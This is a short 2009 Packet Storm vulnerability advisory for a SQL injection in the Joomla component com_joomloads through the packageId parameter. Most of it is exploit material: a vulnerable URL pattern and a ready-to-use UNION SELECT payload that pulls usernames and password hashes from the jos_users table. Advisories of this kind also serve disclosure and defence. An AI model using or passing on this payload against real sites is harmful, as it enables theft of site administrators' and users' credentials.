Joomla Joomloads SQL Injection

2009-07-23T00:00:00
ID PACKETSTORM:79558
Type packetstorm
Reporter Mr.tro0oqy
Modified 2009-07-23T00:00:00

Description

                                        
                                            `=======================================================  
+++++++++++++++++++ information +++++++++++++++++++++++  
=======================================================  
[+] Script : Joomla Component com_joomloads (packageId) Remote SQL Injection Vuln  
  
[+] Found by : Mr.tro0oqy   
  
[+] C0ntact : t.4@windowslive.com <Yemeni ana>  
=======================================================  
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++  
=======================================================  
exploit:  
--------  
http://localhost/path/index.php?option=com_joomloads&view=package&Itemid=2&packageId=<SQL CODE>  
  
  
  
demo:  
-----  
http://www.xxx.com/index.php?option=com_joomloads&view=package&Itemid=2&packageId=-156+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users--  
  
  
`